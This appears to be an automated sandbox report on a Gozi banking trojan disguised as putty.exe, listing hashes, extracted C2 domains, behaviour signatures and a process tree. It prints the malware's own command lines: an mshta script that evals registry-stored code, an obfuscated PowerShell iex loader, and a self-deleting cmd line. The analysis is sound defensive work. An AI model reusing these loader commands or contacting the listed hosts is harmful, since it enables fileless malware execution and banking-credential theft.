Overview

overview

10

Static

static

3

putty.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    150s
  • max time network
    153s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20230915-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20230915-enlocale:en-usos:windows10-2004-x64system
  • submitted
    06-10-2023 16:42

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    putty.exe

  • Size

    292KB

  • MD5

    f63d00d962c43095a6de3838401e5b59

  • SHA1

    c49feab758326a965d30fef2807291cf39c0d61a

  • SHA256

    713061a3f104a116e82686dcc3d7c28e6bac0ea519a166c43a65b2f10cd0bdcf

  • SHA512

    12f2fa8d97edcc5e045d222bc0b74521767f13bc18d190a965b14095367e73fb24cd387e354f345675954f47fdd9e174ff8e257b32e7aaa04cd22b1b17cbd9d7

  • SSDEEP

    3072:/girqLkRXUklcl8F0W6IbV418GM7cCtHEaV0AtdQa9l0Ck5jU:/gY9RJ2l8Nrdb3Q8l0Zj

Score
10/10
gozi5050bankerisfbtrojan

Malware Config

Extracted

Family

gozi

Extracted

Family

gozi

Botnet

5050

C2

mifrutty.com

Attributes
  • base_path

    /jerry/

  • build

    250260

  • exe_type

    loader

  • extension

    .bob

  • server_id

    50

rsa_pubkey.plain
aes.plain

Extracted

Family

gozi

Botnet

5050

C2

http://igrovdow.com

Attributes
  • base_path

    /pictures/

  • build

    250260

  • exe_type

    worker

  • extension

    .bob

  • server_id

    50

rsa_pubkey.plain
aes.plain

Signatures

  • Gozi

    Gozi is a well-known and widely distributed banking trojan.

    bankertrojangozi
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Suspicious use of SetThreadContext 8 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 1 IoCs
  • Modifies registry class 64 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 8 IoCs
  • Suspicious use of AdjustPrivilegeToken 21 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of UnmapMainImage 1 IoCs
  • Suspicious use of WriteProcessMemory 46 IoCs

Processes

  • C:\Windows\System32\RuntimeBroker.exe
    C:\Windows\System32\RuntimeBroker.exe -Embedding
    1⤵
      PID:3384
    • C:\Windows\System32\RuntimeBroker.exe
      C:\Windows\System32\RuntimeBroker.exe -Embedding
      1⤵
        PID:3980
      • C:\Windows\System32\RuntimeBroker.exe
        C:\Windows\System32\RuntimeBroker.exe -Embedding
        1⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:3744
      • C:\Windows\Explorer.EXE
        C:\Windows\Explorer.EXE
        1⤵
        • Suspicious use of SetThreadContext
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious behavior: GetForegroundWindowSpam
        • Suspicious behavior: MapViewOfSection
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of SetWindowsHookEx
        • Suspicious use of UnmapMainImage
        • Suspicious use of WriteProcessMemory
        PID:3172
        • C:\Users\Admin\AppData\Local\Temp\putty.exe
          "C:\Users\Admin\AppData\Local\Temp\putty.exe"
          2⤵
          • Suspicious behavior: EnumeratesProcesses
          PID:2324
          • C:\Windows\SysWOW64\WerFault.exe
            C:\Windows\SysWOW64\WerFault.exe -u -p 2324 -s 1244
            3⤵
            • Program crash
            PID:4720
        • C:\Windows\System32\mshta.exe
          "C:\Windows\System32\mshta.exe" "about:<hta:application><script>Ajch='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Ajch).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\79A35AC8-8476-1390-56BD-F8F7EA41AC1B\\\CharControl'));if(!window.flag)close()</script>"
          2⤵
          • Checks computer location settings
          • Suspicious use of WriteProcessMemory
          PID:3548
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name gbnfsifdv -value gp; new-alias -name vfakart -value iex; vfakart ([System.Text.Encoding]::ASCII.GetString((gbnfsifdv "HKCU:Software\AppDataLow\Software\Microsoft\79A35AC8-8476-1390-56BD-F8F7EA41AC1B").TimeAbout))
            3⤵
            • Suspicious use of SetThreadContext
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious behavior: MapViewOfSection
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:1516
            • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
              "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\d3ct1ya2\d3ct1ya2.cmdline"
              4⤵
              • Suspicious use of WriteProcessMemory
              PID:5056
              • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESDAB0.tmp" "c:\Users\Admin\AppData\Local\Temp\d3ct1ya2\CSCEB404B4C5A234EF18B153B74DB36151.TMP"
                5⤵
                  PID:824
              • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\mr2dtu3d\mr2dtu3d.cmdline"
                4⤵
                • Suspicious use of WriteProcessMemory
                PID:1984
                • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESDBBA.tmp" "c:\Users\Admin\AppData\Local\Temp\mr2dtu3d\CSCC0F7D2624DF94C33904E5FFFBA8D5B5.TMP"
                  5⤵
                    PID:4500
            • C:\Windows\System32\cmd.exe
              "C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\Admin\AppData\Local\Temp\putty.exe"
              2⤵
              • Suspicious use of SetThreadContext
              • Suspicious behavior: MapViewOfSection
              • Suspicious use of WriteProcessMemory
              PID:4396
              • C:\Windows\system32\PING.EXE
                ping localhost -n 5
                3⤵
                • Runs ping.exe
                • Suspicious behavior: CmdExeWriteProcessMemorySpam
                PID:4644
            • C:\Windows\syswow64\cmd.exe
              "C:\Windows\syswow64\cmd.exe" /C pause dll mail, ,
              2⤵
                PID:4676
            • C:\Windows\System32\RuntimeBroker.exe
              C:\Windows\System32\RuntimeBroker.exe -Embedding
              1⤵
              • Modifies registry class
              PID:372
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 2324 -ip 2324
              1⤵
                PID:1876

              Network

              MITRE ATT&CK Enterprise v15

              Replay Monitor

              Loading Replay Monitor...

              Downloads

              • C:\Users\Admin\AppData\Local\Temp\RESDAB0.tmp
                Filesize

                1KB

                MD5

                c1716f0d644bc5384b262dec2bbd4da3

                SHA1

                89c0322e67ba2b84c52501e201b65a5044379bc7

                SHA256

                0487ab0dc5984ffce5d5bcc9698dcd760bd6ca4478ae58bf03f035d16c2e2c78

                SHA512

                5cc35af295d4a2bbe819ab8c2d3fb78678b71c6c812f91524ab04a4912870841185c55abe8bb4fa8d65edcb67a24fe6b26b5f9081963e2d695ce8829c7bc0410

                Download Submit

              • C:\Users\Admin\AppData\Local\Temp\RESDBBA.tmp
                Filesize

                1KB

                MD5

                3ae13a97195f7db4a4cbd56bfec5a970

                SHA1

                60d743d3d9279b75d377162c85f7eb05b232e159

                SHA256

                c549b894ebf933e999e11244278e2358f211921d268a002b39ad16afd523f190

                SHA512

                1225a3813065e9b16b577e1e686f9c0e1c84f73f03ae6bdf42aec0c9d181b56880804127508ce5aac2972b51613b27eba882bf80659f8db8f230bfd03a77680c

                Download Submit

              • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_f4m4eyy3.vdn.ps1
                Filesize

                60B

                MD5

                d17fe0a3f47be24a6453e9ef58c94641

                SHA1

                6ab83620379fc69f80c0242105ddffd7d98d5d9d

                SHA256

                96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                SHA512

                5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                Download Submit

              • C:\Users\Admin\AppData\Local\Temp\d3ct1ya2\d3ct1ya2.dll
                Filesize

                3KB

                MD5

                861e06628eaefd53c4b1ceab940c0f5e

                SHA1

                716a08665681b229bd9c84e639ece9b111fbf0b7

                SHA256

                1313e9861d3bba798ca2bbfc2b2d08b4a6c6fef14268505173fe187015ec2836

                SHA512

                d8913398f651bb1e03bc063f25862db4fc1d503e47b2e46c9a03fd97399c6efbf0da64a34594ee464d87e9d322a97bea67b03e917595fcdf8749b301d250146f

                Download Submit

              • C:\Users\Admin\AppData\Local\Temp\mr2dtu3d\mr2dtu3d.dll
                Filesize

                3KB

                MD5

                f6e4a2da3625485b859fe0540b5af305

                SHA1

                6b9bd4d33a9a6230df765abf14965112df6ce12f

                SHA256

                4d1a8e86065e93596d32ba69a3b7cdaacaf3079571dfac1f329d0c618851034f

                SHA512

                f16c1dcf83cd69b48ea6f95d84dc82525799bc6af3db6315171e8262089c86892ccef884161859503d13348c08455e8f62b0396ca5c7f6399c2391e652c382db

                Download Submit

              • \??\c:\Users\Admin\AppData\Local\Temp\d3ct1ya2\CSCEB404B4C5A234EF18B153B74DB36151.TMP
                Filesize

                652B

                MD5

                3cacb2e409aa5563a2472a961eac024a

                SHA1

                580a114fc4a9fa90e057abc7f2897384989cb93a

                SHA256

                abab648aa28cc7457d77873f063c0626de0288a28acdca0b13838662b96c024e

                SHA512

                40f959edb42e72305ef0feb8bd582a5c4a2d73542b85ae6363253c241bdb1f9762765f36eafbbaedf982a010a7871e18edc8fce47f177dfc1c6c5bcd55566a34

                Download Submit

              • \??\c:\Users\Admin\AppData\Local\Temp\d3ct1ya2\d3ct1ya2.0.cs
                Filesize

                405B

                MD5

                caed0b2e2cebaecd1db50994e0c15272

                SHA1

                5dfac9382598e0ad2e700de4f833de155c9c65fa

                SHA256

                21210b9baafb8b03ab0ef625312973a77bb5aba856c91892b65826e8b7c3b150

                SHA512

                86dc4f8cedd37464c9c492c467375d4603715e5827dfaf7bfcfe5c46ce5e09b439139d4b0a756afa37e4c2444c5b169ac1c024217b9ba449edb183a3b53f2b62

                Download Submit

              • \??\c:\Users\Admin\AppData\Local\Temp\d3ct1ya2\d3ct1ya2.cmdline
                Filesize

                369B

                MD5

                474415ffad05a64d5ea7de38cab1f08c

                SHA1

                c501454a348fd097c40c57cee8582997204993e9

                SHA256

                5ae8940be5602f376ae1bb2d130a25f6516dac8af0a2ab90483f922c13925977

                SHA512

                f1b33dea358bf1f5ce66950ef47ff17e6ec8d79aa848e7f5b6b10846acc680651b1a0d93a0d1f6a8754852edd13e08d0aa3b0128a09ef8ce8b9b0a23bf089dc5

                Download Submit

              • \??\c:\Users\Admin\AppData\Local\Temp\mr2dtu3d\CSCC0F7D2624DF94C33904E5FFFBA8D5B5.TMP
                Filesize

                652B

                MD5

                586bfe034ca11e5fe5018843118a94a9

                SHA1

                f0ae624376b5642a9da15dc11414bc1690a39cb5

                SHA256

                fe7a0d079ace26f54d8f1290cd4c87c0f4b780c5a27ec3bf5bc580ed3c4dd1bf

                SHA512

                106b2502cf1e4cd1f22f79d3727709e5cf9f2b7aebb1a61311133d2b151ee097193335efd3092c4c28c25cb63cf61627fb8da432ec71921b70cce30b0076ce77

                Download Submit

              • \??\c:\Users\Admin\AppData\Local\Temp\mr2dtu3d\mr2dtu3d.0.cs
                Filesize

                406B

                MD5

                ca8887eacd573690830f71efaf282712

                SHA1

                0acd4f49fc8cf6372950792402ec3aeb68569ef8

                SHA256

                568b0c1155379c88e91f904f4e70a3608fbf664ef890309cd705a7c5eb3232c3

                SHA512

                2a538a308db6c7d09224737f549d442b4c206e8e9605a2570149243ee11bf0c5f028ebf003b383f86709d0dd976ff66d15ccb700f50969ff3da64dd39cab25c7

                Download Submit

              • \??\c:\Users\Admin\AppData\Local\Temp\mr2dtu3d\mr2dtu3d.cmdline
                Filesize

                369B

                MD5

                66515a6c4959d8c7518d26e05b6b14d8

                SHA1

                7a9b8b8cec9bbd9606abffb28f50927442e05269

                SHA256

                de843cc17bdf6b8c79900f6ce957072b710ba9d68631f39ffc9c83793cf1d2f8

                SHA512

                d15bad65382067adb238cb2109e38a33d4e2c51551fe97dc4202bcf36104675dfbcbc22f395776ee7de6588503a7cba72105f87f04ee0287922318487f561996

                Download Submit

              • memory/372-89-0x000001F21B640000-0x000001F21B6E4000-memory.dmp

                Filesize

                656KB

                Download

              • memory/372-120-0x000001F21B640000-0x000001F21B6E4000-memory.dmp

                Filesize

                656KB

                Download

              • memory/372-98-0x000001F21B150000-0x000001F21B151000-memory.dmp

                Filesize

                4KB

                Download

              • memory/1516-68-0x0000027BECDE0000-0x0000027BECE1D000-memory.dmp

                Filesize

                244KB

                Download

              • memory/1516-23-0x0000027BECA80000-0x0000027BECA90000-memory.dmp

                Filesize

                64KB

                Download

              • memory/1516-24-0x0000027BECA80000-0x0000027BECA90000-memory.dmp

                Filesize

                64KB

                Download

              • memory/1516-54-0x0000027BECDE0000-0x0000027BECE1D000-memory.dmp

                Filesize

                244KB

                Download

              • memory/1516-38-0x0000027BEC9E0000-0x0000027BEC9E8000-memory.dmp

                Filesize

                32KB

                Download

              • memory/1516-67-0x00007FFB2D8C0000-0x00007FFB2E381000-memory.dmp

                Filesize

                10.8MB

                Download

              • memory/1516-22-0x00007FFB2D8C0000-0x00007FFB2E381000-memory.dmp

                Filesize

                10.8MB

                Download

              • memory/1516-12-0x0000027BEC9F0000-0x0000027BECA12000-memory.dmp

                Filesize

                136KB

                Download

              • memory/1516-25-0x0000027BECA80000-0x0000027BECA90000-memory.dmp

                Filesize

                64KB

                Download

              • memory/1516-52-0x0000027BECBA0000-0x0000027BECBA8000-memory.dmp

                Filesize

                32KB

                Download

              • memory/2324-7-0x0000000002350000-0x0000000002450000-memory.dmp

                Filesize

                1024KB

                Download

              • memory/2324-2-0x0000000002320000-0x000000000232B000-memory.dmp

                Filesize

                44KB

                Download

              • memory/2324-1-0x0000000002350000-0x0000000002450000-memory.dmp

                Filesize

                1024KB

                Download

              • memory/2324-3-0x0000000000400000-0x000000000228F000-memory.dmp

                Filesize

                30.6MB

                Download

              • memory/2324-9-0x0000000002320000-0x000000000232B000-memory.dmp

                Filesize

                44KB

                Download

              • memory/2324-4-0x0000000002340000-0x000000000234D000-memory.dmp

                Filesize

                52KB

                Download

              • memory/2324-8-0x0000000000400000-0x000000000228F000-memory.dmp

                Filesize

                30.6MB

                Download

              • memory/3172-56-0x0000000008EC0000-0x0000000008F64000-memory.dmp

                Filesize

                656KB

                Download

              • memory/3172-57-0x0000000002B80000-0x0000000002B81000-memory.dmp

                Filesize

                4KB

                Download

              • memory/3172-109-0x0000000008EC0000-0x0000000008F64000-memory.dmp

                Filesize

                656KB

                Download

              • memory/3384-82-0x000001A877DB0000-0x000001A877E54000-memory.dmp

                Filesize

                656KB

                Download

              • memory/3384-91-0x000001A875BC0000-0x000001A875BC1000-memory.dmp

                Filesize

                4KB

                Download

              • memory/3384-94-0x000001A877DB0000-0x000001A877E54000-memory.dmp

                Filesize

                656KB

                Download

              • memory/3744-115-0x0000021024410000-0x00000210244B4000-memory.dmp

                Filesize

                656KB

                Download

              • memory/3744-70-0x0000021024410000-0x00000210244B4000-memory.dmp

                Filesize

                656KB

                Download

              • memory/3744-71-0x0000021023E90000-0x0000021023E91000-memory.dmp

                Filesize

                4KB

                Download

              • memory/3980-76-0x000001D1A4B20000-0x000001D1A4BC4000-memory.dmp

                Filesize

                656KB

                Download

              • memory/3980-117-0x000001D1A4B20000-0x000001D1A4BC4000-memory.dmp

                Filesize

                656KB

                Download

              • memory/3980-77-0x000001D1A4AE0000-0x000001D1A4AE1000-memory.dmp

                Filesize

                4KB

                Download

              • memory/4396-90-0x0000029D36BD0000-0x0000029D36C74000-memory.dmp

                Filesize

                656KB

                Download

              • memory/4396-119-0x0000029D36BD0000-0x0000029D36C74000-memory.dmp

                Filesize

                656KB

                Download

              • memory/4396-102-0x0000029D36BD0000-0x0000029D36C74000-memory.dmp

                Filesize

                656KB

                Download

              • memory/4396-101-0x0000029D36C80000-0x0000029D36C81000-memory.dmp

                Filesize

                4KB

                Download

              • memory/4644-105-0x0000026100C70000-0x0000026100C71000-memory.dmp

                Filesize

                4KB

                Download

              • memory/4644-118-0x0000026100DD0000-0x0000026100E74000-memory.dmp

                Filesize

                656KB

                Download

              • memory/4644-104-0x0000026100DD0000-0x0000026100E74000-memory.dmp

                Filesize

                656KB

                Download

              • memory/4676-114-0x0000000001490000-0x0000000001528000-memory.dmp

                Filesize

                608KB

                Download

              • memory/4676-112-0x0000000001110000-0x0000000001111000-memory.dmp

                Filesize

                4KB

                Download

              • memory/4676-107-0x0000000001490000-0x0000000001528000-memory.dmp

                Filesize

                608KB

                Download